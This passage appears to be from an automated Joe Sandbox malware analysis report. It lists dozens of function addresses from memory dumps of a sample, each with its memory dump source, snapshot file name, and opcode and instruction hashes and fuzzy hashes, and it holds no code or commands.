                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18f3d5af12a371dd08ea09277bacf5e6ba1d1952ba704b08bd31a96bdb9f1fc8
                                                  • Instruction ID: 28d3f3cba2cc04646bd657199de7cfe6661751a21497f899216ddaab156d3e36
                                                  • Opcode Fuzzy Hash: 18f3d5af12a371dd08ea09277bacf5e6ba1d1952ba704b08bd31a96bdb9f1fc8
                                                  • Instruction Fuzzy Hash: FB41F4B4E00349EFCB48CFA8C58159DBFB2BF88310F24C1AAD855A7351D7349A92CB51
                                                  Function 00CDF6F0 Relevance: .1, Instructions: 82COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 29cd643d1c8650128e5b2ec8a331ab4f03008b5899e3afb65200811827ab3f74
                                                  • Instruction ID: c7b5d26222aa5333ece7101cfcdc3cf88502d83163bf6f400676ad0141332eb1
                                                  • Opcode Fuzzy Hash: 29cd643d1c8650128e5b2ec8a331ab4f03008b5899e3afb65200811827ab3f74
                                                  • Instruction Fuzzy Hash: 38315671E0022A8FCF05DFA4D8505FEBBB1FB89310F04457AD115A7360DB705A0ACBA1
                                                  Function 00CDE8F0 Relevance: .1, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c3104983e09d8229011a85d30de260cfe301399c5b96b50f72db01b60b9f25c
                                                  • Instruction ID: ac5f25ac6fe0a21a50db32425ad69f9a5d5c052a249d8463deefece0fef0d892
                                                  • Opcode Fuzzy Hash: 2c3104983e09d8229011a85d30de260cfe301399c5b96b50f72db01b60b9f25c
                                                  • Instruction Fuzzy Hash: EF31CF70E052498FCB45EFA5C8586EEBFB1BF41300F1485DBD554AB391DB305A41CB91
                                                  Function 00CDFE70 Relevance: .1, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6e2f6c59f5a11719c1879743100c4442f245cab1548c5d58cd4633b76c6fee1d
                                                  • Instruction ID: 26f3f2103380de3bc9addf203d988e096b55a8dc972e9ea5d38b9f3fb6551636
                                                  • Opcode Fuzzy Hash: 6e2f6c59f5a11719c1879743100c4442f245cab1548c5d58cd4633b76c6fee1d
                                                  • Instruction Fuzzy Hash: F531C274D002099FCB08DFAAD4419EEBBF6BF88310F50816AD915B7350DB79AA41CF91
                                                  Function 00CDC4E8 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3e89687fca35cd144080bdd1236ac4320db962d4f3b8b9256c71c7e208b5e066
                                                  • Instruction ID: a317cdf673609f2750cee223267297d0420b7411268ef3bbb9cb5f71f618f258
                                                  • Opcode Fuzzy Hash: 3e89687fca35cd144080bdd1236ac4320db962d4f3b8b9256c71c7e208b5e066
                                                  • Instruction Fuzzy Hash: DC31E474E0020A9FCB44DF99D5455EEBBB2FF88310F10806AD925B7350D739AA41CFA1
                                                  Function 0069D104 Relevance: .1, Instructions: 72COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4145797826.000000000069D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_69d000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4824d46fa4a868654ce757fe53ff6a528b9b0ee6c4e7bec295027f382871c80
                                                  • Instruction ID: f2e38b3c2c3325b01d890aae8e36eb9302b67bde8562a0875f513b6b44103aad
                                                  • Opcode Fuzzy Hash: c4824d46fa4a868654ce757fe53ff6a528b9b0ee6c4e7bec295027f382871c80
                                                  • Instruction Fuzzy Hash: 7321F276604244EFDF04DF14D9C4B26BBAAFB94314F20C5B9E8494B796C33AD846CA61
                                                  Function 0069D030 Relevance: .1, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4145797826.000000000069D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_69d000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4035dfd8f834b4d0e3eeb8af3e78459635aa4cced2ed3a2e28f72625cbb9f84
                                                  • Instruction ID: 6cc20cfe6750c5dc48ca770d800cf457a509a8dafb209b3220b21002f37ff853
                                                  • Opcode Fuzzy Hash: c4035dfd8f834b4d0e3eeb8af3e78459635aa4cced2ed3a2e28f72625cbb9f84
                                                  • Instruction Fuzzy Hash: A2210571504240DFDF10DF18DAC4B2ABBAAFB94724F20C67AD9494B741C33AD84BC662
                                                  Function 00CDC1E8 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 25316a08f2d36c802b5e4d03aef817e37819dd5d16e4504b39808218f9ab932c
                                                  • Instruction ID: f03c2ed778742132b19a2c0b498b018bc973bc13823cf54e3f2103b3be009660
                                                  • Opcode Fuzzy Hash: 25316a08f2d36c802b5e4d03aef817e37819dd5d16e4504b39808218f9ab932c
                                                  • Instruction Fuzzy Hash: 3D2149B5E05249EFCB44DFA8D5809AEBFF1FF99300F1481AAE859E7352D6308A41CB51
                                                  Function 00CDDFC9 Relevance: .1, Instructions: 65COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6eab0b6fc9605074bf80a80bbe251624ec24cf7732c73b7335fd1eb9765c2ace
                                                  • Instruction ID: 712f329de398e10ba62d337147774d449d7e544c406f516b96940f6a1bdbd0d9
                                                  • Opcode Fuzzy Hash: 6eab0b6fc9605074bf80a80bbe251624ec24cf7732c73b7335fd1eb9765c2ace
                                                  • Instruction Fuzzy Hash: C1210574E002099FCB49DFA9C5415EEBBF2EF88310F1080AAD514B7361DB355A41CFA0
                                                  Function 00CDDFD8 Relevance: .1, Instructions: 60COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8a36e776605db6086ab190b64804a71d46061bca44afaa151463febe0e8d6f7a
                                                  • Instruction ID: 127dea4f1d606ecce46b8825da1296b423d16d106987a5d976c9b2b31ef1ca55
                                                  • Opcode Fuzzy Hash: 8a36e776605db6086ab190b64804a71d46061bca44afaa151463febe0e8d6f7a
                                                  • Instruction Fuzzy Hash: 4321A274E002199FCB48DFA9D5459EEBBF6EF88310F10846AE519B7350DB35AA41CFA0
                                                  Function 00CDF618 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9e514536216deb81a1c1c78ca45c2aee64efa21a0a33a68742c9117747bc7e5
                                                  • Instruction ID: be9f8775abbd51d9059d864021fb2e2da6e358f8bfdea8cb65c9c13777070512
                                                  • Opcode Fuzzy Hash: f9e514536216deb81a1c1c78ca45c2aee64efa21a0a33a68742c9117747bc7e5
                                                  • Instruction Fuzzy Hash: 02211AB4E04209AFDB44CFA8D98459DFBB1FF88310F14C1AAE469A7751D7349A56CB40
                                                  Function 00CDF628 Relevance: .1, Instructions: 58COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4561ce37887cd055db32f688022e04ce85c9628daeeedf1ae6cb0c49c1d470c
                                                  • Instruction ID: bbb574ef6c4e859260bcb31fa2371b086743013300948a5d6a96a31ecaf96a5d
                                                  • Opcode Fuzzy Hash: a4561ce37887cd055db32f688022e04ce85c9628daeeedf1ae6cb0c49c1d470c
                                                  • Instruction Fuzzy Hash: 8E21C8B4E0020DAFDB44DFA9D98469DFBF1FF88310F10C1AAA519A7715D7709A51CB50
                                                  Function 00CDDF18 Relevance: .1, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 682127eb901c0b840cc3c1736c95639e1d142b531655e019e83542864b40b4fd
                                                  • Instruction ID: c33e5a1af0580ef00863dcc12e56591606459d790f9d3a9ff08e4ab8190fcce0
                                                  • Opcode Fuzzy Hash: 682127eb901c0b840cc3c1736c95639e1d142b531655e019e83542864b40b4fd
                                                  • Instruction Fuzzy Hash: AF21AF70E41209AFDB44DFE9C8819AEFBB1BB48310F65C5AAD516A7314D7349A81CB50
                                                  Function 0069D0FF Relevance: .1, Instructions: 53COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4145797826.000000000069D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_69d000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction ID: 39af42a3cb13660ddc1a3c0a364b24689cc7755f04209949f96ae8b4a55734bd
                                                  • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                  • Instruction Fuzzy Hash: BC11DD76504284CFDB05CF10C9C4B55BFA2FB84314F24C6AADC494BB96C33AD84ACB61
                                                  Function 0069D02B Relevance: .1, Instructions: 51COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4145797826.000000000069D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0069D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_69d000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                  • Instruction ID: e199cd7d99d394cf184941cf322d6398d0b71a52dee188e075ce8cd474d1e5e3
                                                  • Opcode Fuzzy Hash: f4fd1685533d0d384cdf4d5ee6433410c1088aed2c2c41d4a7b17b624f589a6c
                                                  • Instruction Fuzzy Hash: B3119175504280CFDB11DF14D58475AFB66FB94314F24C6AAD8494BB52C33AD84ACBA2
                                                  Function 00CD99D8 Relevance: .0, Instructions: 48COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2929ae926bd188d6c48a56ffd5ee50e900b6e6de0bb9156b155664be869b88f0
                                                  • Instruction ID: 4c2649257bbcbc6f29d3a7e0e44a569d63138bc6f4501f1a32448edb0c009698
                                                  • Opcode Fuzzy Hash: 2929ae926bd188d6c48a56ffd5ee50e900b6e6de0bb9156b155664be869b88f0
                                                  • Instruction Fuzzy Hash: 45112870E05249AFCB44EFA8C9415ADBFB2FF45300F1086AAD019AB365DB305B46DB91
                                                  Function 00CDA9A8 Relevance: .0, Instructions: 46COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f9fa831f2b7c71e4c8a2916a36786e9285012c2c7d8137ff50d9fa14741d7c12
                                                  • Instruction ID: fa6286a639f7bc2dbf109c22a284c229c006a7264f6a69939403fd306a74668a
                                                  • Opcode Fuzzy Hash: f9fa831f2b7c71e4c8a2916a36786e9285012c2c7d8137ff50d9fa14741d7c12
                                                  • Instruction Fuzzy Hash: A1119674E01209EFCB44DFA8D5406ADBBF6FB49301F2085AAD419E7350DB349E41DB51
                                                  Function 0068D8B9 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4145722050.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_68d000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5cf1efc43a26dbc1ab3bcbc9a61a724d599d225721d2720e0bc4723bbee4de55
                                                  • Instruction ID: 8dc2f5ea97840768b7de2195a1d2e82d2ce763a6061f3f99eab6fcc4567173f7
                                                  • Opcode Fuzzy Hash: 5cf1efc43a26dbc1ab3bcbc9a61a724d599d225721d2720e0bc4723bbee4de55
                                                  • Instruction Fuzzy Hash: B901A7710083449AEB106A1AD9847A7BFA9DF55324F18C62AED094B2C6C6799C40C771
                                                  Function 00CDC1F8 Relevance: .0, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f46fb176bd6c07b90e98056c29889d21becc3ca82ffb5238b84a720fd195350
                                                  • Instruction ID: 9e4300098328296be631dbc224a5d3174740ed1d7144e160674b1176a4bccbf8
                                                  • Opcode Fuzzy Hash: 6f46fb176bd6c07b90e98056c29889d21becc3ca82ffb5238b84a720fd195350
                                                  • Instruction Fuzzy Hash: 6F110974E01219EFCB44DFA8D5805AEBBF6FF89310F2085AAE819A3351DB319B41DB51
                                                  Function 00CD99E8 Relevance: .0, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 38be1a9ed6c2c617dad759b70bbb6044cacde0226c01aa529c5e2bb59cdce9c4
                                                  • Instruction ID: 5607fa7c82e858ed1ecc3988c0c04dd422612e5b60c1c7bd3f55d168d2a7c53b
                                                  • Opcode Fuzzy Hash: 38be1a9ed6c2c617dad759b70bbb6044cacde0226c01aa529c5e2bb59cdce9c4
                                                  • Instruction Fuzzy Hash: 4F11F770E01209EFCB44EFA8D5416ADFBB5FF44300F1086AAD019A7359EB705B46DB94
                                                  Function 00CD9878 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b1ce97ecad2d45ac13b7c2836b43acb56ad4bebad15ed5448a0c0c4b1e1a07ce
                                                  • Instruction ID: aaf2a6186404a5afcd0143663cf434bfc253403bbbe64004ea6560e41f882e3c
                                                  • Opcode Fuzzy Hash: b1ce97ecad2d45ac13b7c2836b43acb56ad4bebad15ed5448a0c0c4b1e1a07ce
                                                  • Instruction Fuzzy Hash: AC014870916208EFCB05DFA5D90A59CBFB6BF42304F14C2EAD015A7261DB345B0ADF11
                                                  Function 00CDABC0 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 83847038013f5fe511d9b0ced5128d4e77c376cc480a14f03745879177de5a0e
                                                  • Instruction ID: 3655528182032bcbd60f6841879e809ecdce0886a86dff998982653171d57404
                                                  • Opcode Fuzzy Hash: 83847038013f5fe511d9b0ced5128d4e77c376cc480a14f03745879177de5a0e
                                                  • Instruction Fuzzy Hash: AC0156B4E05208AFCB05CFA9D98049DBBB2AB85310F20C1EBD458A7261CA304A42DB01
                                                  Function 00CDCB47 Relevance: .0, Instructions: 41COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 613cb316d04462511d62aecc3925a0c951d2f81b6a5f975a3d433fea48846f48
                                                  • Instruction ID: d3cbec613e51999949e6b11fbb446774a6c93e233a03b52026c0584f67a1ba00
                                                  • Opcode Fuzzy Hash: 613cb316d04462511d62aecc3925a0c951d2f81b6a5f975a3d433fea48846f48
                                                  • Instruction Fuzzy Hash: 5401CC70E452499FCB01CFE8D8815CDBBB0BF4A310F1002EBD4249B262D7358A06CB90
                                                  Function 0068D8B8 Relevance: .0, Instructions: 36COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4145722050.000000000068D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0068D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_68d000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f110c8dad4635148c307cf69b5de679d1216e7c571c04ba43d296f85fe7b81d4
                                                  • Instruction ID: ca38bccc991f171df514c6f2a88ceb78773ed442e6086d4c36050da50a763f20
                                                  • Opcode Fuzzy Hash: f110c8dad4635148c307cf69b5de679d1216e7c571c04ba43d296f85fe7b81d4
                                                  • Instruction Fuzzy Hash: 3DF06271404344AAEB109A1AD884BA2FFA8EF55734F18C55AED484B286C2799C44CB71
                                                  Function 00CDABD0 Relevance: .0, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a266dc7187e2b7802b3db9d1772dc359a5f93bb7881d1f2c57a608e37b5525b8
                                                  • Instruction ID: 09d4f79ef8e0a53765848b0ab0198d80dbf24a0a044f52d0a595cf79d173f1df
                                                  • Opcode Fuzzy Hash: a266dc7187e2b7802b3db9d1772dc359a5f93bb7881d1f2c57a608e37b5525b8
                                                  • Instruction Fuzzy Hash: EEF037B4E00608ABDB08CF9AD48059DFBF2FF84310F20C1AAE918A3314DB309B45DB41
                                                  Function 00CDDDCC Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ed1fc646c3b6ff0bfd2e1000af45bf7e6ca00033e4f20b4e77e6ee8f4f3c085f
                                                  • Instruction ID: b033864d7c265540c4a1a57273865c683a2131a7da7d1859030fb31bbcf0f263
                                                  • Opcode Fuzzy Hash: ed1fc646c3b6ff0bfd2e1000af45bf7e6ca00033e4f20b4e77e6ee8f4f3c085f
                                                  • Instruction Fuzzy Hash: BDF0E174D093889FC742DBB4D415558BFB0AF06200F1981DBD854DB363E6355909CB92
                                                  Function 00CD9BE7 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f423bc07489f4e1ffeef576df68d728f584c50ae5b163aedd46b129bb17f70ef
                                                  • Instruction ID: fba7d3040656562ae9f787d8f1636af3770f2027179c26cbdf3ce3d05609fccd
                                                  • Opcode Fuzzy Hash: f423bc07489f4e1ffeef576df68d728f584c50ae5b163aedd46b129bb17f70ef
                                                  • Instruction Fuzzy Hash: FE019674A122099FCB54CFA8E78569DBBB2FB84300F20616AE11AAB314D7709E85CB00
                                                  Function 00CD9F98 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e39a85fae8513cc8f6786234a53a659107530b26f66c7a0b0e86e7e5c7dc73da
                                                  • Instruction ID: e5f6b26fc048877fdca48e55afa4bd0d090c49709784c33b5a18cf09f670360a
                                                  • Opcode Fuzzy Hash: e39a85fae8513cc8f6786234a53a659107530b26f66c7a0b0e86e7e5c7dc73da
                                                  • Instruction Fuzzy Hash: 4A01B2B4D0220ADFCB44DFA8D6449AEBBF1FF49304F2081AAD419A7360DB319B51DB91
                                                  Function 00CD9888 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ef9ae54c58deb037dae05da7a916e9e9ffe92070799cfa588fdcf37ac11c877
                                                  • Instruction ID: c1f73307394aa7cb9985884ef3409f6a972efd3dda11f798170937b318219827
                                                  • Opcode Fuzzy Hash: 8ef9ae54c58deb037dae05da7a916e9e9ffe92070799cfa588fdcf37ac11c877
                                                  • Instruction Fuzzy Hash: 9FF01474D02208EFCB04DFA9E94969CFBB2FB41704F20C2A9D029A3350DB745B45EB41
                                                  Function 02500428 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bfee2468925089626ae2b772659d646ff828e26b90d4d748aad1d815377f6490
                                                  • Instruction ID: db873ca770dae4b6a08d562a172689c26027edd8054dfa008cb2bef8754c5c81
                                                  • Opcode Fuzzy Hash: bfee2468925089626ae2b772659d646ff828e26b90d4d748aad1d815377f6490
                                                  • Instruction Fuzzy Hash: C2F0B734A01208EFCB58DFA8D984BACBBF5BB44705F2045A9D405973E0EB709F84DB5A
                                                  Function 02500A00 Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be49fe9d177190b5942a0c19569a326d6975d31b54c0f36d88cd3ccdc9696aed
                                                  • Instruction ID: 620aabbb5b58abb39327944267ac1ec6797390f460ab58b96ad492720cc499c7
                                                  • Opcode Fuzzy Hash: be49fe9d177190b5942a0c19569a326d6975d31b54c0f36d88cd3ccdc9696aed
                                                  • Instruction Fuzzy Hash: 3BF03434A41208EFCBA4DBA8D984BACBBB5BB80304F6004A9D805A77C0EB745F80DB45
                                                  Function 02501038 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2c2bd5701981cf0d287ae67b3899c7febfe824527177f820f60f1f18466b2855
                                                  • Instruction ID: ff8c56fb9ac4818f171a1ecef1762810b1ad090b317466e9c6f1afdbb6db4bf0
                                                  • Opcode Fuzzy Hash: 2c2bd5701981cf0d287ae67b3899c7febfe824527177f820f60f1f18466b2855
                                                  • Instruction Fuzzy Hash: 2CF06530941148EFCB24CB94DAA4EBD7776BB41344F6045A8D44967390CB765F40EB56
                                                  Function 02501580 Relevance: .0, Instructions: 26COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a8e701da9b27f44347fd9fa80048354294b8735edac2164d562233f6e68b2ae2
